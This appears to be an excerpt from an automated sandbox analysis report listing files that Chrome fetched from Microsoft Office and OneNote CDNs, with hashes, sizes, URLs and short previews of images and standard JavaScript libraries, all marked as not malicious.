                                                                                      Preview:{"floodgate":{"cdnUrl":"https://res.cdn.office.net/admincenter/admin-main/2024.10.17.1/","loaderSpec":{"type":"scriptUrl","content":"https://res.cdn.office.net/admincenter/admin-main/2024.10.17.1/floodgate.en.bundle.js"},"version":"2024.10.17.1"},"ariaLoggerId":"ea84b6a3285140258eaeb7caaab5884a-9d3ca75b-b3ee-42b8-a22c-ab0759ad4d38-7330","hostingAppUrls":"{\"M365AdminPortal\":\"https://admin.microsoft.com\",\"EXOAdminPortal\":\"https://admin.exchange.microsoft.com\",\"SPOAdminPortal\":\"https://admin.microsoft.com/sharepoint\",\"TeamsAdminPortal\":\"https://admin-int.teams.microsoft.net/\",\"MSGraphEndPoint\":\"https://graph.microsoft.com\",\"CDNContentURL\":\"https://res.cdn.office.net/admincenter/admin-content\",\"AriaLoggerGlobalCollectorEndpoint\":\"https://mobile.events.data.microsoft.com/Collector/3.0\",\"AriaLoggerEUCollectorEndpoint\":\"https://eu-mobile.events.data.microsoft.com/Collector/3.0\",\"AriaLoggerId\":\"ea84b6a3285140258eaeb7caaab5884a-9d3ca75b-b3ee-42b8-a22c-ab0759ad
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 222 x 204, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):6336
                                                                                      Entropy (8bit):7.887073484659419
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:5D71229F6CA9EBFF5F7972F01B547C7C
                                                                                      SHA1:4D71B33506E6F0EBA1C783DE37E36480F2E392BE
                                                                                      SHA-256:ABC0FA95B72F082CF4FBB18267CDBD282F2909B65B1B479D7F339DB41769946E
                                                                                      SHA-512:31915EB859D432D714CAA2DFF74B7E760DFFE3A672CD872EB8CF07EDDC3B544578640C315CD47802B34F4BF06B31D290C9CBEAB228BC1FA64BDAF36DC523273A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:.PNG........IHDR..............y.'....IDATx^.....y.....)...5..MT....6./..f.m,@*......W.A...o&..$.Q."7............ 0k.VdI..VL.`...w.k|;...u....=.sf.~....s.9g/w..9.<.93..".H$]]..ttt..*....7g.ys.0}zg..3u....E.$C...G....|'N...jk.f.....i..X0....X8....C....^;v..:..:.a.m....rz.x<..c..q..>..S...t.s....<...o..Cw.y......<x...*....6e........3.._..9H.f..}.._......m.F.#.Wd...(.J........|yB....|...+."O+.B.=..^.6-cK...|./.t..m .f._...F.E.oum\..>.7l..l.<.f..[.H.mZFiC...-_..#....[.d..{........Z.~dd.......t.../`S.^.z...........-....Gm...n....m..2...#n!%..Ci.j..t....7..M...........8t.......^..h..d..]a.....K....L.....x6|6xM.s.M.../.]...=..........<4..l.......e......>J1.....D.;w.|..fY...x........m....W.+...9.Q>S.l..J.U.f0..._Z..Y....._s.O..!.2....u&..zo.z.-..>S..p....... .....x=u..2.M.jGb..G9.V.<;d."x@...@.......c.f.p......5....ZQ..8].<^.)c..f(.W....[...^.....gCW&.$i...I.&x.0.~8..!.x.t../>.c..:.(..cN..]XD..-...gk{.gCW9....<.'.l.... ..v.........<.....).
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):144527
                                                                                      Entropy (8bit):5.270658476600385
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:9DECB0C734D0ECAD3E60A93F23DB8F39
                                                                                      SHA1:96BC3698D305077A5A5CF09303BE1195FA65824C
                                                                                      SHA-256:54C618DE71735F3693D0DF3ACD1A36DD17AFF1655D09A0F2A23A314F9BA92765
                                                                                      SHA-512:F3457AD524DB82CCC8EBDA6A152AA5E9BBB4B79BC87C946EF20DDACE8346119B71513F965876F414106B252D346B20D9ECC0E9DCABE389FA2A34530AB48D1F75
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:var onenoteSync;!function(){var t={107:function(t,n,e){t.exports=function(){"use strict";var t=function(){return t=Object.assign||function(t){for(var n,e=1,r=arguments.length;e<r;e++)for(var i in n=arguments[e])Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i]);return t},t.apply(this,arguments)};function n(t,n,e){if(e||2===arguments.length)for(var r,i=0,s=n.length;i<s;i++)!r&&i in n||(r||(r=Array.prototype.slice.call(n,0,i)),r[i]=n[i]);return t.concat(r||Array.prototype.slice.call(n))}var r="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:"undefined"!=typeof window?window:e.g,i=Object.keys,s=Array.isArray;function o(t,n){return"object"!=typeof n||i(n).forEach((function(e){t[e]=n[e]})),t}"undefined"==typeof Promise||r.Promise||(r.Promise=Promise);var u=Object.getPrototypeOf,a={}.hasOwnProperty;function c(t,n){return a.call(t,n)}function h(t,n){"function"==typeof n&&(n=n(u(t))),("undefined"==typeof Reflect?i:Reflect.ownKeys)(n).forEach((function(e){l(t,e,n[e])}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (29173), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):29173
                                                                                      Entropy (8bit):5.201883067368051
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:F6228139447C795F72C09114F8289A8C
                                                                                      SHA1:0D0499DC74723111C0B78792B40BF5B8D04A2FB2
                                                                                      SHA-256:E6108C2F14C08CE48EB243728C24011A8E70E60DCA21BFA51FFFC6B1B8A999C7
                                                                                      SHA-512:F3087F1B24B65AA4F2007B168A8F5A1D0ACFA8BB6677FF156CE6A4B4A76234820B390F2DC444DE2EEFC4F58FB35BF3E1F866481A92383C914D20BBD44EDBC0A2
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:!(function(){if("PerformanceLongTaskTiming"in window){var e=window.__tti={e:[]};e.o=new PerformanceObserver((function(t){e.e=e.e.concat(t.getEntries())}));e.o.observe({entryTypes:["longtask"]})}})();!(function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports["es6-symbol"]=t():(e["es6-symbol"]=t(),e.Symbol=e.Symbol||e["es6-symbol"])})(window,(function(){return(function(e){var t={};function n(r){if(t[r])return t[r].exports;var i=t[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}return n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 102 x 102, 8-bit/color RGBA, non-interlaced
                                                                                      Category:downloaded
                                                                                      Size (bytes):1922
                                                                                      Entropy (8bit):7.799930090275787
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:D212459353E8FD1D2514C77703D44F1F
                                                                                      SHA1:A0CABB548A218E87FBCB4D4ADDEA47068A4288D3
                                                                                      SHA-256:7AD89A907BFE47019D905B92D0C203082AA75852D39B480E6FBE1718A8EA3647
                                                                                      SHA-512:8AA0C6904EFE31A38B2A52F05F79153D933BC48C028D18C110F59089D0EB7EAF2D97E84A42F81BAA8906AFD2BBD8C895FE53D8E998A4417422B97497556E1B7D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_resources/1033/m2/box43.png
                                                                                      Preview:.PNG........IHDR...f...f.....9..b...IIDATx^.ml.E..o.E..........B....'_$..&.&.....h....A..4......[..........]iC..h1.HjE.......K&......>....<3;{._......X$..T\\(.o..#..2K....g.....Oe...C..`..p..ee%...g`.e.8....b.k.c.P.:B.tv^W..2RW.,.g.j.........y..i....2.P.....T.G...Z..5.......5H..?.H...P...9..(.h.....p}..9.tS0.......q}..`pWFK..9..(....8.......L..]O..z<.%.".4..Lj:F....4.............@..s$../bux.N.%.`..$IN...%'{#.....<..]|....0..AYt..CDI..$...=....H)..W>.>.+G>....1b........(..1?R.A...Q...C`...X...C..q]..&.........."~.o~0.P....~(|`..^Ph......"....P.]._U0.....k.t....e.%.y3......C`.{...._$..'....k.5..J.`R........'.A....0..P(4......g...m...Z.d.I...Q.QbA..f._.nm...".....K...Cw4...k..F.e..=~..d....|s.....`.V.*..`....j..ww....-..V....f.......C...6v...p.9Y..h..Wj]..._`......Z..G.m.?..*..w)...~...(.....=a=.]a.+R...5.`.H$..D..ehW...@..2..#..j..T.w...c..T.w...#~....e........e.k.....C.c..e.F.2.`..j..1._:....o_,.j:.!0...%....9..c.......OY0.;....0|.U>.@`...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (32038)
                                                                                      Category:dropped
                                                                                      Size (bytes):95992
                                                                                      Entropy (8bit):5.391333957965341
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:F03E5A3BF534F4A738BC350631FD05BD
                                                                                      SHA1:37B1DB88B57438F1072A8EBC7559C909C9D3A682
                                                                                      SHA-256:AEC3D419D50F05781A96F223E18289AEB52598B5DB39BE82A7B71DC67D6A7947
                                                                                      SHA-512:8EEEAEFB86CF5F9D09426814F7B60E1805E644CAC3F5AB382C4D393DD0B7AB272C1909A31A57E6D38D5ACF207555F097A64A6DD62F60A97093E97BB184126D2A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.3",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:downloaded
                                                                                      Size (bytes):3147
                                                                                      Entropy (8bit):5.8734839640917516
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:DFE3652C1EA0FC667C2E2A4261CD64DF
                                                                                      SHA1:943F0D0650C11D8386406397701B0CEF5E759AA3
                                                                                      SHA-256:784545063730163ED3F249AA0285F8B06553C65E8BCA1AA01FE1C699175845F1
                                                                                      SHA-512:D09C3AD8B1F88F26F58633FFCD759B7A262F9318AE6AE1E65B45676FBD87E8A9AA4AA7B077EA85D40F91E302053C1828097ADB73E1375973C9D14A8B0FA3CF98
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://wise-m.public.cdn.office.net/wise-m/owl/5mttl/production/10/manifest.json
                                                                                      Preview:{"clientVersion":"20241022.4","files":{"owl.js":["owl.60b0607ba5126556995f.js","sha384-zDj3tmNYOwI2Am9oqiJuUbxIaqusrXTjzUd363HCfgg6i2ghsMasGwdCF60uMl6Q"],"owl.slim.js":["owl.slim.3fa2c9c3701ebced3bca.js","sha384-yahtC8hwk8GSYMODl/5HooFPYeo4GRkkrG0e5oCKKinnLifATz+1C343rSkOYQIn"],"owlnest.js":["owlnest.9b8213be8ac8f0683002.js","sha384-HLSNmHA5WyyRDQkWqjGHIqfG1jJbiJ9on/1ItCDW/s74A6I3NMUU+NURu6U2TFXr"],"authwebworker.js":["authwebworker.1e854ce4990e8cb68c1e.js","sha384-aLLZVqovQQU7Ox3t5eatei8rWrvm5jOvBXcI3CoOeUWGsujvHUYikecoSQJXsnpG"],"sharedauthclient.js":["sharedauthclient.d39162c303dd9c59a0b9.js","sha384-hvv59LW8MYRaPhiDsNda4L8FuuGinGTOzYhULujODsEQFbBHWKC5+Qt3otL+vxtU"],"sharedauthclientinteractive.js":["sharedauthclientinteractive.4e8d8cd9eee1cfb3c162.js","sha384-AAafx3qf00WWge43xDnO9HBNP42FZ58TVQIzTmDaxtfYcm8vVw+OLV2Kv5bCi4TK"],"sharedauthclientmsal.js":["sharedauthclientmsal.39dcdf70a2434436117b.js","sha384-tpvjg53cnAY5Ku4H8RkNIKuRYPYkZqgGeq+TVwolQx0fjiV2k7JNAV2Lr8LrwDDo"],"sharedaut
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):3831
                                                                                      Entropy (8bit):5.120639874211328
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:72D9A825554620C51BF0018A457E7F2E
                                                                                      SHA1:23400E26C69A1F8A47236FFAD4BC80FC80BA773E
                                                                                      SHA-256:365009220D893F07B356C7F253CECD5A9F7E06D6207A3DD7A148FC73812B4FE6
                                                                                      SHA-512:9212035EFC74AD61A74FA806229E4A97BB9FB50698B0B15BD7296AD53B6A2C9A43D0A3E2082286F4AC60167E129E07CB511638A103C510DB3B5ADA6A383165A6
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://cdn.onenote.net/officeaddins/161821840453_Scripts/ExternalResources/js-cookie.js
                                                                                      Preview:/*!.. * JavaScript Cookie v2.1.3.. * https://github.com/js-cookie/js-cookie.. *.. * Copyright 2006, 2015 Klaus Hartl & Fagner Brack.. * Released under the MIT license.. */..;(function (factory) {...var registeredInModuleLoader = false;...if (typeof define === 'function' && define.amd) {....define(factory);....registeredInModuleLoader = true;...}...if (typeof exports === 'object') {....module.exports = factory();....registeredInModuleLoader = true;...}...if (!registeredInModuleLoader) {....var OldCookies = window.Cookies;....var api = window.Cookies = factory();....api.noConflict = function () {.....window.Cookies = OldCookies;.....return api;....};...}..}(function () {...function extend () {....var i = 0;....var result = {};....for (; i < arguments.length; i++) {.....var attributes = arguments[ i ];.....for (var key in attributes) {......result[key] = attributes[key];.....}....}....return result;...}.....function init (converter) {....function api (key, value, attributes) {.....var res
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (28488)
                                                                                      Category:downloaded
                                                                                      Size (bytes):409584
                                                                                      Entropy (8bit):4.820651785868298
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:1E4F97EA439FFDD90F9546620038D5D4
                                                                                      SHA1:E36215A823445A6CA7E0C9AB4E4C3C04C44289AB
                                                                                      SHA-256:DDF9B6FBE337192EE7334115B15D604DB9778202B7D28FAABB96E10D8F55E3C8
                                                                                      SHA-512:618032088824727B6C2F1E5BFE04F82C111B08EAEE3F2AB496BB51B1A318377A1417CD1A07833AD729397CB41FA5EF66D58DA189B0A5D53FABC04B35F5A15B5D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/1033/onenote-ribbon-intl.min.js
                                                                                      Preview:var OnenoteRibbonStrings={About:"About",AboutKeytip:"D",Accessibility:"Accessibility",AddInsKeytipPrefix:"Y",AdditionalControls:"Additional Controls",AlignLeft:"Align Left",AlignLeftKeytip:"AL",AlignRight:"Align Right",AlignRightKeytip:"AR",AltText:"Alt Text",AltTextKeytip:"E",AltTextTableStandalone:"Edit Table Alt Text",AudioTabTitle:"Record & Playback",AutoCorrectOptions:"AutoCorrect Options...",AutoCorrectOptionsKeytip:"AC",Automatic:"Automatic",AutomaticKeytip:"A",Back15Seconds:"Back 15 Seconds",Back15SecondsKeytip:"B",Bold:"Bold",BoldKeytip:"1",BrowseVersions:"Page Versions",BrowseVersionsKeytip:"V",BulletLibraryTitle:"Bullet Library",BulletStyle1:"Solid",BulletStyle1Keytip:"S",BulletStyle2:"Hollow",BulletStyle2Keytip:"H",BulletStyle3:"Square",BulletStyle3Keytip:"B",ButtonOfficeAddins:"Office Add-ins",CentimeterUnitPlaceholder:"{0} cm",Checklist:"Checklist",ChecklistKeytip:"CL",BulletedList:"Bulleted list",BulletedListKeytip:"BL",NumberedList:"Numbered list",NumberedListKeytip:"NL
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (27024), with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):27026
                                                                                      Entropy (8bit):5.536845977615562
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:A230E20FEECBB758D7C13303A657EEDD
                                                                                      SHA1:F12606CCE8600D9DFB5316610EE5177BA51B0CE9
                                                                                      SHA-256:816A0F42A2BF473213A47BE1DDE62215811D54AF1151A1E9916DC215DF6EC776
                                                                                      SHA-512:1C6F7288BEBAB71D8B6C7CE21D5F1FAA53C6710FAF1A0F611C0313E71BD5DB17A304E433686836AB2EEAE0E0ACBDDEAA2E1E82EDE54145520542C0361066FEE0
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/h816A0F42A2BF4732_resources/1033/EditSurface.css
                                                                                      Preview: FocusedContentControl*{margin:0;padding:0;}.EditingSurfaceBody{background-color:transparent;border:none;outline:none;}.EditingSurfaceBody,.EditingSurfaceBody *{-ms-touch-select:none;-webkit-user-select:text;-khtml-user-select:text;-moz-user-select:text;-ms-user-select:text;}.EditMode span.SpellingError,.EditingSurfaceBody span.SpellingError{background-image:url('data:image/gif;base64,R0lGODlhBQAEAJECAP////8AAAAAAAAAACH5BAEAAAIALAAAAAAFAAQAAAIIlGAXCCHrTCgAOw==');border-bottom:solid 1px transparent;}.EditMode span.DictationCorrection,.EditingSurfaceBody span.DictationCorrection{background-image:url("data:image/svg+xml;utf8,<svg xmlns='http://www.w3.org/2000/svg' width='3' height='4'><path d='M 0 0 L 5 5' stroke='gray' stroke-width='1px'/></svg>");border-bottom:solid 1px transparent;}.EditMode span.ContextualSpellingAndGrammarError,.EditingSurfaceBody span.ContextualSpellingAndGrammarError{background-image:url('data:image/gif;base64,R0lGODlhBQAEAPEDAABVzDNVzDNV/wAAACH5BAUAAAMALAAAAAAFAAQ
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                      Category:dropped
                                                                                      Size (bytes):1864
                                                                                      Entropy (8bit):5.222032823730197
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                      SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                      SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                      SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):421076
                                                                                      Entropy (8bit):5.583580815311071
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:8017EFC165ED5E4071013E77982A10E7
                                                                                      SHA1:503B6090E3741A1423D1C03962304A5128ADACC2
                                                                                      SHA-256:9AFD741D5FF23189871E012B80CEBFBB8E220044555372CA0FE0979C94707624
                                                                                      SHA-512:302EB07B9FC306FEFDB4C773D87A3A38065158AAD9DC8DDB37431487DC2767983C6B3569BB209CD8E02C12ADED4985D10D3590B29CE45DE6C0C9DD2D5D96A52C
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:function asyncGeneratorStep(e,t,o,n,r,i,s){try{var a=e[i](s),l=a.value}catch(e){return void o(e)}a.done?t(l):Promise.resolve(l).then(n,r)}function _async_to_generator(e){return function(){var t=this,o=arguments;return new Promise((function(n,r){var i=e.apply(t,o);function s(e){asyncGeneratorStep(i,n,r,s,a,"next",e)}function a(e){asyncGeneratorStep(i,n,r,s,a,"throw",e)}s(void 0)}))}}function _define_property(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e}function _object_spread(e){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},n=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(n=n.concat(Object.getOwnPropertySymbols(o).filter((function(e){return Object.getOwnPropertyDescriptor(o,e).enumerable})))),n.forEach((function(t){_define_property(e,t,o[t])}))}return e}function ownKeys(e,t){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.fi
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):567080
                                                                                      Entropy (8bit):5.293882251364021
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:D0088929A1883CDCE38D9FF173DA5D0E
                                                                                      SHA1:525C99223C38786C06433DD7C18AD4C7731A950F
                                                                                      SHA-256:DA5BE621BA6D7C6398D682ADF7B923924C904B2593190FF0DF8E8679EAA02788
                                                                                      SHA-512:3040E5E3C0D82BFDD4122E293CE2D0336681E03D20F0D6AEADD0289A880F10C86B6A6483F968C0ACC35839E6E73314CB3768FD9B4D72E6D76194BFAE3C3247F2
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).augLoop=e()}}((function(){return function e(t,n,o){function r(a,s){if(!n[a]){if(!t[a]){var u="function"==typeof require&&require;if(!s&&u)return u(a,!0);if(i)return i(a,!0);var c=new Error("Cannot find module '"+a+"'");throw c.code="MODULE_NOT_FOUND",c}var l=n[a]={exports:{}};t[a][0].call(l.exports,(function(e){return r(t[a][1][e]||e)}),l,l.exports,e,t,n,o)}return n[a].exports}for(var i="function"==typeof require&&require,a=0;a<o.length;a++)r(o[a]);return r}({1:[function(e,t,n){"use strict";var o=e("exportStarHelper");Object.defineProperty(n,"__esModule",{value:!0}),o(e(2),n)},{2:2}],2:[function(e,t,n){"use strict";Object.defineProperty(n,"__esModule",{value:!0}),n.isStopWorkflowMessage=n.setStopAndFilterWorkflowMessage=n.setMessageE
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (63604)
                                                                                      Category:downloaded
                                                                                      Size (bytes):130560
                                                                                      Entropy (8bit):5.272245687496742
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:ACDFECB80B06F30C59B48F9B2140E6F5
                                                                                      SHA1:C46873F855BDABF9943DA278813B53B4DD6FB6D6
                                                                                      SHA-256:CA46523D06A57712685B5C6B01430B530FE76F8FD5803179FCAA3466770E93A0
                                                                                      SHA-512:9BD579F55596F100C7A3723AE2345F3C43785BAF0576BFB5060F495FC8B7CCA3BD9FB43EA71B6F39FB68DFA82B80239A862E8186AD2956F2D4DFE1C971BEF293
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://res-1.cdn.office.net/files/sp-client/odsp.react/odsp.react.lib-9ea4d016.js
                                                                                      Preview:/*! For license information please see odsp.react.lib-9ea4d016.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.react.lib"],{react_340:function(e){"use strict";var t=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,a=Object.prototype.propertyIsEnumerable;function i(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},n=0;n<10;n++)t["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(t).map(function(e){return t[e]}).join(""))return!1;var a={};return"abcdefghijklmnopqrst".split("").forEach(function(e){a[e]=e}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},a)).join("")}catch(e){return!1}}()?Object.assign:function(e,r){for(var o,s,c=i(e),d=1;d<arguments.length;d++){for(var l in o=Object(arguments[d]))n.ca
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (616)
                                                                                      Category:downloaded
                                                                                      Size (bytes):2395280
                                                                                      Entropy (8bit):5.621813735147151
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:00A1160C879D7DC00D9A8693B6899A2F
                                                                                      SHA1:6B8E243B8B5B44EFDA496BBE178DC8153B4F982E
                                                                                      SHA-256:0FB5855C124A1DC24D40900CF3C8A1F2091088394A28612BC9C3E2DCC06E1D3B
                                                                                      SHA-512:7D886D9571C6A5AD5952A412ECE39767BE1AE94260456BF12DBEEB4925A4255328FFCEDD991B3AE1E3F4A47E06C3114E844FF38C3890CFAF05576ED70CC6ADFE
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/hF2D4A670C00B7D9D_App_Scripts/OneNoteDS.box4.dll2.js
                                                                                      Preview:'use strict';(globalThis.dullscriptWebpackJsonp=globalThis.dullscriptWebpackJsonp||[]).push([[2],{51490:function(ya,Sa,H){function Ba(ea){var da={costPriority:1,samplingPolicy:1,persistencePriority:1,dataCategories:0,diagnosticLevel:100};ea.eventFlags&&ea.eventFlags.dataCategories||(0,O.b)(0,0,function(){return"DataCategories"});if(!ea.eventFlags)return da;ea.eventFlags.costPriority&&(da.costPriority=ea.eventFlags.costPriority);ea.eventFlags.samplingPolicy&&(da.samplingPolicy=ea.eventFlags.samplingPolicy);.ea.eventFlags.persistencePriority&&(da.persistencePriority=ea.eventFlags.persistencePriority);ea.eventFlags.dataCategories&&(da.dataCategories=ea.eventFlags.dataCategories);ea.eventFlags.diagnosticLevel&&(da.diagnosticLevel=ea.eventFlags.diagnosticLevel);return da}function Fa(ea,da,ba,ua,la,ha,ia,Y,fa,ma,ta){ua.forEach(function(S){ea.sendTelemetryEvent({eventName:da.name+".Qos.Error."+ba,eventFlags:{diagnosticLevel:110},dataFields:(0,Q.wQc)((0,Q.wQc)([],t.g.By({ieg:S,FOf:la,isIntenti
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (41569), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):41569
                                                                                      Entropy (8bit):5.349246096567034
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:345BFF8D2E34511694D9D12A008F5F5D
                                                                                      SHA1:B3F35302052C26C285C43B935BCE972904E62E28
                                                                                      SHA-256:DD4039F8AFAC6FD76B462C4FD4F90374B18DB762719108491AC2E365196D71AC
                                                                                      SHA-512:5B6A9EB510BFBD7198D00BA674FEB6D04B6E95A7E359A0C9B1C17086FACA1859AE4FE126985812C0AB1E87FEA963FA9B169C3A21A7DA534EC79B972D0935A692
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/wacairspaceanimationlibrary.js
